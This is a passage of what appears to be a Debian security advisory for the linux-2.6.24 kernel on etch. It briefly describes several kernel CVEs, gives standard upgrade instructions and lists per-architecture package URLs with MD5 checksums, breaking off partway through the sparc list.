Eric Paris provided several fixes to increase the protection\n    provided by the mmap_min_addr tunable against NULL pointer\n    dereference vulnerabilities. \n\nCVE-2009-3080\n\n    Dave Jones reported an issue in the gdth SCSI driver. A missing\n    check for negative offsets in an ioctl call could be exploited by\n    local users to create a denial of service or potentially gain\n    elevated privileges. \n\nCVE-2009-3726\n\n    Trond Myklebust reported an issue where a malicious NFS server\n    could cause a denial of service condition on its clients by\n    returning incorrect attributes during an open call. \n\nCVE-2009-3889\n\n    Joe Malicki discovered an issue in the megaraid_sas driver. \n    Insufficient permissions on the sysfs dbg_lvl interface allow\n    local users to modify the debug logging behavior. \n\nCVE-2009-4005\n\n    Roel Kluin discovered an issue in the hfc_usb driver, an ISDN\n    driver for Colognechip HFC-S USB chip. \n\nCVE-2009-4020\n\n    Amerigo Wang discovered an issue in the HFS filesystem that would\n    allow a denial of service by a local user who has sufficient\n    privileges to mount a specially crafted filesystem. Avati discovered an issue in the fuse subsystem. If the\n    system is sufficiently low on memory, a local user can cause the\n    kernel to dereference an invalid pointer resulting in a denial of\n    service (oops) and potentially an escalation of privileges. \n\nCVE-2009-4138\n\n    Jay Fenlason discovered an issue in the firewire stack that allows\n    local users to cause a denial of service (oops or crash) by making\n    a specially crafted ioctl call. \n\nCVE-2009-4308\n\n    Ted Ts\u0027o discovered an issue in the ext4 filesystem that allows\n    local users to cause a denial of service (NULL pointer\n    dereference). This option is disabled by\n    default. \n\nCVE-2010-0007\n\n    Florian Westphal reported a lack of capability checking in the\n    ebtables netfilter subsystem. If the ebtables module is loaded,\n    local users can add and modify ebtables rules. \n\nCVE-2010-0410\n\n     Sebastian Krahmer discovered an issue in the netlink connector\n     subsystem that permits local users to allocate large amounts of\n     system memory resulting in a denial of service (out of memory). \n\nCVE-2010-0415\n\n    Ramon de Carvalho Valle discovered an issue in the sys_move_pages\n    interface, limited to amd64, ia64 and powerpc64 flavors in Debian. \n\nCVE-2010-0622\n\n    Jermome Marchand reported an issue in the futex subsystem that\n    allows a local user to force an invalid futex state which results\n    in a denial of service (oops). \n\nFor the oldstable distribution (etch), this problem has been fixed in\nversion 2.6.24-6~etchnhalf.9etch3. \n\nWe recommend that you upgrade your linux-2.6.24 packages. \n\nUpgrade instructions\n- --------------------\n\nwget url\n        will fetch the file for you\ndpkg -i file.deb\n        will install the referenced file. \n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n        will update the internal database\napt-get upgrade\n        will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration. \n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nOldstable updates are available for alpha, amd64, arm, hppa, i386,\nia64, mips, mipsel, powerpc, s390 and sparc. \n\nSource archives:\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24-6~etchnhalf.9etch3.dsc\n    Size/MD5 checksum:     5118 e05bb21e7655cbfa39aed8d4fd6842eb\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24-6~etchnhalf.9etch3.diff.gz\n    Size/MD5 checksum:  4099250 127bad8d653046d37fc52115d4e3a332\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24.orig.tar.gz\n    Size/MD5 checksum: 59630522 6b8751d1eb8e71498ba74bbd346343af\n\nArchitecture independent packages:\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-doc-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb\n    Size/MD5 checksum:  4263554 6c56ff077d17eba766af47544ce0f414\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-tree-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb\n    Size/MD5 checksum:    83890 62cfd18ed176359831502e70d80b291a\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-source-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb\n    Size/MD5 checksum: 46871628 328ad30d3c07f90c56d821f76e186b40\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-manual-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb\n    Size/MD5 checksum:  1550090 1f114fdc3123f135017dbdcd0e4839c6\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-patch-debian-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb\n    Size/MD5 checksum:  1009878 c7b7abff092940a400703b9168e46daa\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-support-2.6.24-etchnhalf.1_2.6.24-6~etchnhalf.9etch3_all.deb\n    Size/MD5 checksum:    98248 a2a391008f8855d8358d5f18d9d76044\n\nalpha architecture (DEC Alpha)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-generic_2.6.24-6~etchnhalf.9etch3_alpha.deb\n    Size/MD5 checksum:   329786 a212d2b3a94f8a04611c0f20d3d324b9\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-smp_2.6.24-6~etchnhalf.9etch3_alpha.deb\n    Size/MD5 checksum: 27236282 b5bc553c4bf3a49843c45814fab72443\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_alpha.deb\n    Size/MD5 checksum:    83428 f5f27b9de4905239e6315c77393f1f03\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-alpha_2.6.24-6~etchnhalf.9etch3_alpha.deb\n    Size/MD5 checksum:    83454 5d152b5b6aa505982ebc7122a770b29b\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-generic_2.6.24-6~etchnhalf.9etch3_alpha.deb\n    Size/MD5 checksum: 26641900 c799e7d48937975036b46edf032ecd87\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-legacy_2.6.24-6~etchnhalf.9etch3_alpha.deb\n    Size/MD5 checksum: 26620162 eb1c3c27f1ac81959dc0f2ab497aee35\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_alpha.deb\n    Size/MD5 checksum:  3455268 da2d2cc2b7c4253ac408c30fcfddb28f\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-legacy_2.6.24-6~etchnhalf.9etch3_alpha.deb\n    Size/MD5 checksum:   329788 f589f8815f7adf02f8884e2dd3ac613f\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-smp_2.6.24-6~etchnhalf.9etch3_alpha.deb\n    Size/MD5 checksum:   329336 14bf085655b30adc8ab8f6ed4207d415\n\namd64 architecture (AMD x86_64 (AMD64))\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_amd64.deb\n    Size/MD5 checksum: 19482308 c49d2962c1a391fb00fb1b5f0598b24e\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_amd64.deb\n    Size/MD5 checksum:  3656476 f2f5de65037664d03208fcea83bf2ee2\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_amd64.deb\n    Size/MD5 checksum:    83422 600c7216143f43f9c61b0c2ccd118ea0\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-amd64_2.6.24-6~etchnhalf.9etch3_amd64.deb\n    Size/MD5 checksum:    83434 36f1d8f21ec39a473536dbeda2332e62\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_amd64.deb\n    Size/MD5 checksum:   346940 d3f12fdd61f90749fdd08d857b326327\n\narm architecture (ARM)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-footbridge_2.6.24-6~etchnhalf.9etch3_arm.deb\n    Size/MD5 checksum:  9357734 3e1165a0795d7db5f7ed8ef84205064b\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-footbridge_2.6.24-6~etchnhalf.9etch3_arm.deb\n    Size/MD5 checksum:   298744 50d8bfa3c06134e190409399a36c5aa9\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_arm.deb\n    Size/MD5 checksum:    83546 1742ab93afadd1827009bf1d714e76eb\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-arm_2.6.24-6~etchnhalf.9etch3_arm.deb\n    Size/MD5 checksum:    83578 07906e33f9ad267d986991c93eef1048\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-iop32x_2.6.24-6~etchnhalf.9etch3_arm.deb\n    Size/MD5 checksum: 10778670 cc38a718ad5fd1c6e92d23e416610bd6\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-iop32x_2.6.24-6~etchnhalf.9etch3_arm.deb\n    Size/MD5 checksum:   308138 34dbc7720b1844833f0b71aa307c37fa\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-ixp4xx_2.6.24-6~etchnhalf.9etch3_arm.deb\n    Size/MD5 checksum:   310714 6a2c6fbbc1dd000b8a532227e3b8b5ae\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_arm.deb\n    Size/MD5 checksum:  3939512 91c2ba626e754fe407d6dcf3fa01337a\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-ixp4xx_2.6.24-6~etchnhalf.9etch3_arm.deb\n    Size/MD5 checksum: 10786892 4d44a4ff751969855a01ad754a7c2b22\n\nhppa architecture (HP PA RISC)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc64_2.6.24-6~etchnhalf.9etch3_hppa.deb\n    Size/MD5 checksum: 14375048 fe6ed4dea09aa205d801476667ef03cb\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb\n    Size/MD5 checksum: 13847788 4adc3106a987d84e12215156a379f460\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc64_2.6.24-6~etchnhalf.9etch3_hppa.deb\n    Size/MD5 checksum:   259624 ac09dcabb624984b7321a5f6b6dbef54\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-hppa_2.6.24-6~etchnhalf.9etch3_hppa.deb\n    Size/MD5 checksum:    83578 e152e18748e5c80b6d06715db836cf83\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb\n    Size/MD5 checksum:   260838 44bc8ad5796c124b53d85a8c3a4ed912\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc64-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb\n    Size/MD5 checksum:   262420 ff0641f04c409dd606c34373e8e16269\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc64-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb\n    Size/MD5 checksum: 14830990 cce09e8022bee915dcde5dd8b9525428\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc_2.6.24-6~etchnhalf.9etch3_hppa.deb\n    Size/MD5 checksum: 13333594 a4dc863b0c84b9006c723db9a581c92e\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_hppa.deb\n    Size/MD5 checksum:    83546 990eb24056c7f6a63a4d55ec39563bae\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_hppa.deb\n    Size/MD5 checksum:  3446386 6ebfa4544252648df48cfb085cc3d2cc\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc_2.6.24-6~etchnhalf.9etch3_hppa.deb\n    Size/MD5 checksum:   258962 75184bed1f0b42cd8e002f93ed42198a\n\ni386 architecture (Intel ia32)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_i386.deb\n    Size/MD5 checksum:  3656680 c5499cb98cdcdcadc48e3aa5bdf1d379\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-486_2.6.24-6~etchnhalf.9etch3_i386.deb\n    Size/MD5 checksum: 19214268 e3f564cae5a85355f4b5a9248a11af98\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-686_2.6.24-6~etchnhalf.9etch3_i386.deb\n    Size/MD5 checksum: 19148424 dd1d713c896888370a1667a16571c08c\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_i386.deb\n    Size/MD5 checksum:   346982 6a6a08f74f9690705e6d770d1f3f2566\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-486_2.6.24-6~etchnhalf.9etch3_i386.deb\n    Size/MD5 checksum:   359548 b10fe011746b0df5fbd2587292af34ae\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_i386.deb\n    Size/MD5 checksum: 19482314 5d9cc150e340aea40e253a757cfdc423\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-i386_2.6.24-6~etchnhalf.9etch3_i386.deb\n    Size/MD5 checksum:    83452 32a1614212e964a4423b161b34cd758d\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-686-bigmem_2.6.24-6~etchnhalf.9etch3_i386.deb\n    Size/MD5 checksum: 19213598 4f459c2d2cdb87a6f945cbee7d4500d4\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-686-bigmem_2.6.24-6~etchnhalf.9etch3_i386.deb\n    Size/MD5 checksum:   358212 58ba32b0701643f043ab38a487cae609\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_i386.deb\n    Size/MD5 checksum:    83424 c1e8493aff96df5b0fe33f5af4686f98\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-686_2.6.24-6~etchnhalf.9etch3_i386.deb\n    Size/MD5 checksum:   358752 4e3e9ef18a14fd191444591df571f80c\n\nia64 architecture (Intel ia64)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_ia64.deb\n    Size/MD5 checksum:  3569470 9ae824064bfc785f4b3512db78119e46\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-mckinley_2.6.24-6~etchnhalf.9etch3_ia64.deb\n    Size/MD5 checksum: 32206374 badd40dd68e2c6634c65f79d9536e34d\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_ia64.deb\n    Size/MD5 checksum:    83432 64a48fa9283b1741e22f0a22dbb93b20\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-ia64_2.6.24-6~etchnhalf.9etch3_ia64.deb\n    Size/MD5 checksum:    83456 235a5572d5e109a4b575080a8262dc57\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-mckinley_2.6.24-6~etchnhalf.9etch3_ia64.deb\n    Size/MD5 checksum:   319938 d7dc0120458e93119879dcdd1e48017e\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-itanium_2.6.24-6~etchnhalf.9etch3_ia64.deb\n    Size/MD5 checksum: 32025762 7595d7dc21d3273f46b35b8c00b0e195\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-itanium_2.6.24-6~etchnhalf.9etch3_ia64.deb\n    Size/MD5 checksum:   320226 34731a37b519d726b133093e04d937c3\n\nmips architecture (MIPS (Big Endian))\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum: 22243472 532341ea0847ea19414413f7659ff13d\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum:   248638 ce9da5c377d6328e9bb9be1c3945fff8\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r5k-ip32_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum: 12001172 817c44fd5afbeef1b9f172522ff21bcb\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r4k-ip22_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum: 10553972 20ddd95631b93efd52ae0aa38a5cd6d4\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-mips_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum:    83600 a7b66d71779dea207a3d49cb9f692fdb\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum: 27858364 54998117445c20f413331d1197355745\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum: 17212542 bf6c996fd387eef151e0db60d1bd00f2\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum:   313302 314b57dc807eb91f617c10b1497e1617\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum:   314602 2c127076bf189be2836a4c3a4c7736af\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum:  3804368 fbcb3bdd668db166ad3f08e6dbfbc6e0\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum: 17194888 9bce41a8b9936a16a3aa9cca675b9638\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum:    83540 8acdb1b4a4bc57f55b9cc5b2b04043a4\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r5k-ip32_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum:   229412 0b93c7c909eca04fad4fa45e3e73e96c\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum:   248700 13266a2acd5fcbd75d11049dd5e5ad58\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r4k-ip22_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum:   218314 4174dec1c73ca114469cbb88fba32926\n\nmipsel architecture (MIPS (Little Endian))\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum: 16567710 29d2ab68b4259a1822a2ca19e9494f5d\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum:   309868 d69b27ef946f2ac62b115e0200fe8002\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum: 26988356 f0d885b353b15dc42e4e76da8a8fb129\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum:   248150 7c585f74e0752a631050b13b9740c0c3\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r5k-cobalt_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum: 13318088 0b0a8b724245ac10817b03c4cf734827\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-mipsel_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum:    83484 a678208f18017a9c87d45548916fd98e\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum:   311392 5b1f0957a2756b04be6c95ae8ca5e2c8\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum: 21736368 02da1a4e543b8c5082476b156281cb31\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r5k-cobalt_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum:   247968 929ca712a0aa0984f9dc2a6f68f405a5\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum: 16632240 c9de1dfccb8a5cb5d5d652ca694a7108\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum:  3805532 be10a8b64da3adf7ece3846b0b0bf930\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum:    83434 ac0cb9b5939e4ea82c3c83a1a1d473ed\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum:   248174 50e84058a7d710f013f92e1fe68a705c\n\npowerpc architecture (PowerPC)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc-smp_2.6.24-6~etchnhalf.9etch3_powerpc.deb\n    Size/MD5 checksum:   322474 2d7e39cf0b78d98125a0baba377f1af0\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc_2.6.24-6~etchnhalf.9etch3_powerpc.deb\n    Size/MD5 checksum: 19195556 bb2bd8e203cee7b3c6739d5c5d11901a\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc64_2.6.24-6~etchnhalf.9etch3_powerpc.deb\n    Size/MD5 checksum:   324008 3b021bb4b3dac72dc68e701f4a209939\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc-miboot_2.6.24-6~etchnhalf.9etch3_powerpc.deb\n    Size/MD5 checksum:   295928 ca2bf1c3c12f409e469c516877a8e91c\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc64_2.6.24-6~etchnhalf.9etch3_powerpc.deb\n    Size/MD5 checksum: 21170062 4022dbff73ebfde3a846ce38896cf09c\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc_2.6.24-6~etchnhalf.9etch3_powerpc.deb\n    Size/MD5 checksum:   322502 4b76cce255e1fcc72cb82053cd34a1a2\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc-miboot_2.6.24-6~etchnhalf.9etch3_powerpc.deb\n    Size/MD5 checksum: 17459240 ad749c6e735e58d775b7190ff3d26e50\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-powerpc_2.6.24-6~etchnhalf.9etch3_powerpc.deb\n    Size/MD5 checksum:    83466 a041c0fdb383832cf725723ce22e40c0\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_powerpc.deb\n    Size/MD5 checksum:    83430 392d415932625b1a69dc6494d2f737e0\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_powerpc.deb\n    Size/MD5 checksum:  3674486 200fdcca2140a97f961a37d70db620d5\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc-smp_2.6.24-6~etchnhalf.9etch3_powerpc.deb\n    Size/MD5 checksum: 19487244 b42ad8431643d89a1f8b0e6e0aaeb39e\n\ns390 architecture (IBM S/390)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_s390.deb\n    Size/MD5 checksum:    83532 a1c34683fe304f1a86bbc28f6cbc654c\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-s390_2.6.24-6~etchnhalf.9etch3_s390.deb\n    Size/MD5 checksum:    83556 bf7fed1ef4da92d782409fe8345f861a\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390_2.6.24-6~etchnhalf.9etch3_s390.deb\n    Size/MD5 checksum:  6976486 5b5db16fea4336068bbcd5bff56ad575\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390x_2.6.24-6~etchnhalf.9etch3_s390.deb\n    Size/MD5 checksum:  7228452 75c044fa17d6071de36579a1491c2e1b\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_s390.deb\n    Size/MD5 checksum:  3431908 18825f85900faca81b21e48d43af6ee7\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-s390x_2.6.24-6~etchnhalf.9etch3_s390.deb\n    Size/MD5 checksum:   197006 0a44248e77ec1ff027edd032ebe5b2c6\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390-tape_2.6.24-6~etchnhalf.9etch3_s390.deb\n    Size/MD5 checksum:  1503494 bd7f7b7bd4e120472bf60ad0b7d9184e\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-s390_2.6.24-6~etchnhalf.9etch3_s390.deb\n    Size/MD5 checksum:   196810 f03114c2f256a97b15f88d2659f9501b\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_sparc.deb\n    Size/MD5 checksum:    83428 1ea7179752fbb45e10e731991583db68\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sparc64_2.6.24-6~etchnhalf.9etch3_sparc.deb\n    Size/MD5 checksum:   263546 ef894d6917cbe692ec9197048538d5e7\n  